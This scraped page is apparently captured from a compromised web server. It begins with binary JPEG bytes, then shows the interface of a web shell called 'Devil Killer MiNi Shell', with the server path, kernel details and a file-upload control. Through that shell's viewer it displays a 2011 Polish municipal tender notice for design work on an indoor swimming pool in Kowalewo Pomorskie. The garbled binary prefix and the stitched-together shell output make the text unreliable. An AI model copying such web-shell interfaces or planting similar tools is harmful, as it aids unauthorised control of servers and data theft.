JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110415/79522-N-2011.html

<p class="kh_header"><b>Kowalewo Pomorskie: wykonanie studium wykonalności, koncepcji  architektoniczno programowo  przestrzennej oraz dokumentacji projektowej na budowę krytej  pływalni
( z łącznikami do Szkoły Podstawowej oraz Publicznego Gimnazjum w Kowalewie Pomorskim o ile pozwolą na to warunki techniczne i będzie to uzasadnione pod względem ekonomicznym ) wraz z kosztami  nadzoru autorskiego.</b><br>
<b>Numer ogłoszenia: 79522 - 2011; data zamieszczenia: 15.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kowalewo Pomorskie , Plac  Wolności 1, 87-410 Kowalewo Pomorskie, woj. kujawsko-pomorskie, tel. 056 6841024, faks 056 6841071.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kowalewopomorskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie studium wykonalności, koncepcji  architektoniczno programowo  przestrzennej oraz dokumentacji projektowej na budowę krytej  pływalni
( z łącznikami do Szkoły Podstawowej oraz Publicznego Gimnazjum w Kowalewie Pomorskim o ile pozwolą na to warunki techniczne i będzie to uzasadnione pod względem ekonomicznym ) wraz z kosztami  nadzoru autorskiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie studium wykonalności, koncepcji  architektoniczno programowo przestrzennej oraz dokumentacji projektowej obejmującej wielobranżowy projekt budowlany i wykonawczy wraz z dokumentacją kosztorysową i Specyfikacją Techniczną Wykonania i Odbioru Robót na budowę krytej  pływalni ( z łącznikami do Szkoły Podstawowej oraz Publicznego Gimnazjum w Kowalewie Pomorskim o ile pozwolą na to warunki techniczne i będzie to uzasadnione pod względem ekonomicznym) wraz z kosztami  nadzoru autorskiego.
na działce nr 255 przy ul. Jana Pawła  w Kowalewie Pomorskim.

Dokumentacje projektową należy opracować zgodnie z Rozporządzeniem Ministra Infrastruktury 
z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych. Przy opracowaniu dokumentacji projektowej należy uwzględnić wymogi ustawy z dnia 7 lipca 1994 r. Prawo budowlane ( Dz.U. 
z 2010 r. Nr 243, poz.1623 z późn. zm. ) wraz z przepisami wykonawczymi obowiązującymi w tym zakresie.

I. PROGRAM PŁYWALNI
1. Basen pływacki wewnętrzny o następujących parametrach:
długość                 25,00 m
 szerokość              12,50 m
 głębokość  zróżnicowana zgodnie z obowiązującymi przepisami 
 tory pływackie       5 szt
 wyposażenie: drabinki, słupki startowe - 5 szt,  komplet lin dzielących tory, pasy torów pływackich w dnie i na ścianach czołowych.

2. Basen dla niepływających:
 długość                 ca 12,50 m
 szerokość                ca 8,00 m
 głębokość zróżnicowana zgodnie z obowiązującymi przepisami 
 wyposażenie: schody wejściowe w tym dla niepełnosprawnych, ławeczka podwodna ok. 3 m, dysze do masażu ściennego w ilości 6 szt., urządzenie wodnego masażu karku w tym szeroki, urządzenia do rehabilitacji w tym dla osób niepełnosprawnych,  reflektory podwodne.

3. Brodzik dla dzieci:
 długość                   ca 7,00 m
 szerokość                ca 5,00  6,00 m
 głębokość  zróżnicowana zgodnie z obowiązującymi przepisami 
wyposażenie: jeż wodny, zjeżdżalnia dla dzieci 
4.Wanna do hydromasażu ( JACUZZI)

5.. Hol główny z szatnią i kasą, z możliwością obserwowania części basenowej, toaleta ogólnodostępna i niezbędne wyposażenie.
6. Strefa przedbasenowa z przebieralniami, szatniami, suszarkami, natryskami i zespołami
    sanitarnymi przystosowanymi dla osób niepełnosprawnych oraz pomieszczenia porządkowe wraz z wyposażeniem.
7. Pomieszczenia administracyjno biurowe z wyposażeniem. 
8. Pomieszczenia dla obsługi, sanitarne ogólne i sanitarno socjalne dla pracowników z wyposażeniem. 
9. Komunikacja wewnętrzna (ciągi w butach i ciągi bose).
10. Pomieszczenia techniczne i technologiczne niezbędne dla prawidłowego 
      funkcjonowania pływalni, w tym  m.in.:
      stacja uzdatniania wody,
      wentylatornia,
      magazyn chemii basenowej,
      rozdzielnia elektryczna,
      przyłącza i węzeł ciepłowniczy,
      magazyn ogólny.
11. Dojazd serwisowy do pomieszczeń technicznych zlokalizowanych w części podziemnej pływalni.
12. Łączniki do Szkoły Podstawowej oraz Publicznego Gimnazjum w Kowalewie Pomorskim ( o ile pozwolą na to warunki techniczne i będzie to uzasadnione pod względem ekonomicznym)
II. WYTYCZNE BUDOWLANO EKSPLOATACYJNE
1. Należy zapewnić minimalny poziom zużycia energii w czasie użytkowania obiektu (koszty 
    eksploatacji).
2. Celem zwiększenia efektywności ekonomicznej użytkowania obiektu zaprojektować zintegrowany system grzewczy zaopatrujący  obiekt w niezbędną  energię cieplną. W ramach projektowanego systemu grzewczego należy przewidzieć wyposażenie  obiektu w alternatywne źródła  energii cieplnej w tym ; pompy ciepła  generujące ciepło przy temp. zewnętrznej do minus 25 stopni Celcjusza; zestaw kolektorów słonecznych, urządzenia odzysku energii (ciepła i chłodu ) w centralach wentylacyjnych; inne urządzenia; węzeł cieplny zasilany z kotłowni miejskiej  .
Rozwiązania technologii ogrzewania muszą być poprzedzone analizą finansową obrazującą  koszty ogrzewania  przy zastosowaniu odnawialnych źródeł ciepła , systemu mieszanego oraz konwencjonalnej kotłowni, z uwzględnieniem prognozy  zużycia energii cieplnej  i analizy zwrotu kosztów inwestycji w powiązaniu z kosztami eksploatacji.
3. Powierzchnia zabudowy obiektu powinna być optymalna pod względem funkcjonalno użytkowym
    i ekonomicznym. 
4. Projekt należy uzgodnić z Polskim Związkiem Pływackim oraz  uzgadnianie projektu na każdym etapie opracowania z rzeczoznawcami ds. zabezpieczeń przeciwpożarowych, sanitarno higienicznych  oraz bhp i ergonomi.
5. Opracowana koncepcja architektoniczno programowo przestrzenna winna zawierać również
    wytyczne w zakresie rozwiązań poszczególnych instalacji, jak: wentylacja, ogrzewanie hali basenu,
    oświetlenie, instalacja rozgłaszania przewodowego i instalacja zegarowa, instalacja telefoniczna i 
    teletechniczna w tym przyłącze, instalacja elektronicznego naliczania opłat (kontrola dostępu),
    system monitoringu wewnętrznego i zewnętrznego oraz instalacji zabezpieczającą przed
    włamaniem, instalacja odgromowa, instalacja uzdatniania wody basenowej.
6. Pomieszczenia magazynowania i dozowania środków chemicznych muszą być wyposażone w
    niezbędną aparaturę - zgodnie z obowiązującymi przepisami BHP.
7. Projekt winien zawierać rozwiązania w zakresie dróg dojazdowych, miejsc parkingowych,
    chodników, zieleni i małej architektury.

III. PRZEDMIOT ZAMÓWIENIA OBEJMUJE:
1. Opracowanie studium wykonalności zgodnie z wytycznymi RPO Województwa Kujawsko 
    Pomorskiego w 2 egz. w wersji papierowej oraz w wersja elektroniczna na płycie CD w
     programie WORD lub EXCEL
2. Opracowanie koncepcji architektoniczno programowo przestrzennej w 2 egz. w wersji
    papierowej oraz w wersja elektroniczna (plik pdf) wraz z zestawieniem szacunkowych kosztów
3. Opracowanie mapy do celów projektowych w skali 1:500
4. Wykonanie projektu i badań geologiczno inżynierskich i hydrologicznych
5. Opracowanie projektu budowlanego w ilości 6 egzemplarzy oraz wersja elektroniczna (plik pdf).
6. Opracowanie projektów wykonawczych branżowych w ilości 6 egzemplarzy każda branża oraz
    wersja elektroniczna (plik pdf) w ilości 1 egzemplarz dla każdej branży.
7. Wykonanie kosztorysów inwestorskich (wszystkie branże) opracowanych wg aktualnie obowiązujących przepisów wraz ze zbiorczym zestawieniem kosztów inwestycji 2 komplety orazwersja elektroniczna na płycie CD w programie WORD lub EXCEL 1 komplet dla każdej branży
winny być wykonane w okresie ostatnich 30 dni przed terminem przekazania dokumentacji
projektowo kosztorysowej Zamawiającemu, z uwzględnieniem aktualnych  cen jednostkowych robót określonych na podstawie danych rynku lokalnego oraz czynników cenotwórczych określonych w aktualnej w okresie sporządzania informacji Sekocenbud.
8.Opracowanie specyfikacji technicznych wykonania i odbioru robót (wszystkie branże) po 2 kompletów wraz z wersją elektroniczną na płycie CD.
9.Opracowanie przedmiaru robót dla wykonawców (wszystkie branże) 2 komplety wraz z wersją elektroniczną na płycie CD w programie WORD lub EXCEL 2 komplety.
10.Opracowanie harmonogramu realizacji robót 3 egzemplarze wraz z wersją elektroniczną na płycie CD 2 komplety.
11.Opracowanie opisu przedmiotu zamówienia dotyczącego wszystkich branż, niezbędnego do ogłoszenia przetargu na realizację inwestycji, zgodnie z opracowanym projektem wykonawczym 2 egzemplarze wraz z wersją elektroniczną na płycie CD 2 komplety.
12.Projekt budowlano wykonawczy aranżacji wnętrz w postaci kart pomieszczeń zawierających rodzaje wykończeń, kolorystykę, jak również wykaz sprzętu i urządzeń, w tym do utrzymania w czystości niecki i posadzek całego obiektu 2 egz. wraz z wersją elektroniczną na płycie CD.
13.Projekt  poza częścią  opisową musi zawierać zestawienie wyposażenia z określeniem ilości , cech szczególnych i parametrów tj. wymiarów elementów oraz parametrów umożliwiających jednoznaczne dokonanie zamówienia wyposażenia rodzaje materiałów, oklein, kolory tapicerek, dane techniczne, jednak bez podania nazw własnych i producentów, a także  rysunki techniczne nietypowych elementów  wyposażenia.
14.Wizualizacje obiektu w co najmniej czterech ujęciach z uwzględnieniem terenu zewnętrznego i istniejącego otoczenia.
15.Ewentualne projekty przebudowy i usunięcia kolizji w odniesieniu do istniejących sieci i układu drogowego.
16.Charakterystykę energetyczną obiektu 3 egz.
17.Instrukcję bezpieczeństwa pożarowego obiektu i projekt oznakowania obiektu ppoż. ( uzgodnione przez rzeczoznawcę  ds. ppoż.) obejmujący także teren zewnętrzny, a uwzględniający w szczególności: określenie kierunków ewakuacji, rozmieszczenie podręcznego sprzętu gaśniczego i hydrantów, instrukcji postępowania na wypadek pożaru.
18. Instrukcję bhp oraz regulamin korzystania z obiektu.

W przedmiot zamówienia wchodzi także:
1. Geologiczny odbiór dna wykopu.
2. Udział i pomoc w czynnościach Zamawiającego lub wykonawcy robót budowlanych w celu
     uzyskania wymaganych przepisami pozwoleń administracyjnych, w tym decyzji o pozwoleniu na
    budowę i o pozwoleniu na użytkowanie.
3. Udział w przetargu na wyłonienie wykonawcy robot budowlanych w postaci udzielania za
    pośrednictwem Zamawiającego odpowiedzi oferentom na pytania dotyczące projektu będącego
    przedmiotem niniejszego zamówienia.
4. Sprawowanie nadzoru autorskiego przez projektantów wszystkich branż do czasu zakończenia 
    realizacji inwestycji.

Zamawiający oczekuje autorskich, nowatorskich i nowoczesnych rozwiązań architektonicznych, technologicznych i funkcjonalnych prowadzących do minimalizacji kosztów eksploatacji ( z wykorzystaniem energii słonecznej i geotermalnej ). 
Projektant zobowiązany jest do pisemnego uzgodnienia z inwestorem wstępnej fazy rozwiązań projektowych obiektu kubaturowego, jak i propozycji zagospodarowania terenu. 
Projektant zorganizuje spotkania robocze z inwestorem na etapie sporządzania dokumentacji projektowej w celu omówienia przyjętych rozwiązań projektowych  i materiałowych, które muszą zakończyć się pisemnymi protokółami podpisanymi przez obie strony. 
Projektant wszelkie dodatkowe opracowania niezbędne do uzyskania wymaganych opinii i uzgodnień uzyska własnym staraniem i na swój koszt. 
Opracowana dokumentacja winna być wzajemnie skoordynowana technicznie i kompletna z punktu widzenia celu, któremu ma służyć. 
Dokumentacja musi zawierać wymagane potwierdzenia sprawdzeń rozwiązań projektowych, wymagane opinie, uzgodnienia, zgody i pozwolenia w zakresie wynikającym z przepisów. 
Dokumentacja posiadać będzie oświadczenie Projektanta, podpisane przez sprawdzających odpowiedzialnych za spełnienie tych wymagań i oświadczenie o kompletności. 
W opracowanej dokumentacji będą zastosowane wyroby budowlane (materiały i urządzenia) dopuszczone do obrotu i powszechnie dostępne na rynku, uzgodnione z Zamawiającym na spotkaniach roboczych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.80.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 10 000,00 PLN słownie dziesięć tysięcy złotych.
Wykonawca wnosi wadium przed upływem terminu składania ofert
w pieniądzu, na konto zamawiającego BS Kowalewo Pom. 58 9496 0008 0000 1720 2000 0052 .Kopie dowodu wpłaty należy dołączyć do oferty. Lub w jednej z poniżej podanych form
w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
w gwarancjach bankowych,
w gwarancjach ubezpieczeniowych
w poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620
Odpowiedni dokument należy dołączyć do oferty w osobnej kopercie, kopię należy wpiąć do oferty razem z innymi dokumentami.
Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego.
Dokument w formie poręczenia winien zawierać stwierdzenie, że na pierwsze pisemne żądanie zamawiającego wzywające do zapłaty wadium, zgodnie z warunkami przetargu, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że zrealizował min. jedną usługę w zakresie wykonania dokumentacji projektowo kosztorysowej w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenia zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, odpowiadającą swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia wraz z załączeniem dokumentów (referencji) potwierdzających wartość wykonanych usług oraz należyte wykonanie. Wartość usług wykazanych nie może być mniejsza niż wartość zamówienia, określona w ofercie (w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia w/w warunek może być spełniony łącznie).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponuje osobami minimum po dwóch z każdej specjalności projektant i sprawdzający, które będą realizować zamówienie, posiadającymi uprawnienia do projektowania w specjalności  architektonicznej bez ograniczeń, konstrukcyjno budowlanej bez ograniczeń, sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych bez ograniczeń,sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń,drogowej bez ograniczeń
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia ww warunek może być spełniony łącznie.
Wykonawca może polegać na wiedzy i doświadczeniu oraz osobach  zdolnych do wykonania zamówienia niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany  jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie podmiotów do oddania wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, jeżeli wykonawca polega na wiedzy i doświadczeniu oraz osobach zdolnych do wykonania zamówienia, niezależnie od charakteru prawnego łączących go z nimi stosunków.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz ofertowy , dowód wniesienia wadium,w przypadku złożenia oferty przez wykonawców wspólnie ubiegających się o zamówienie pełnomocnictwo do reprezentowania wykonawców w niniejszym postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, pełnomocnictwo udzielone osobom podpisującym dokumenty ofertowe, o ile prawo  do reprezentowania wykonawcy w powyższym zakresie nie wynika wprost z dokumentów rejestrowych,pisemne zobowiązanie podmiotów do oddania wykonawcy do dyspozycji niezbędnych zasobów na   okres korzystania z nich przy wykonywaniu zamówienia, jeżeli wykonawca polega na wiedzy i  doświadczeniu, oraz osobach zdolnych do wykonania zamówienia niezależnie od charakteru prawnego łączących go z nimi  stosunków,jeżeli wykonawca wykazując spełnienie warunków o których mowa w pkt. V specyfikacji istotnych warunków zamówienia polega na zasobach innych podmiotów na zasadach określonych w art.26 ust.2b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w pkt VI. 2 specyfikacji istotnych warunków zamówienia.</p>
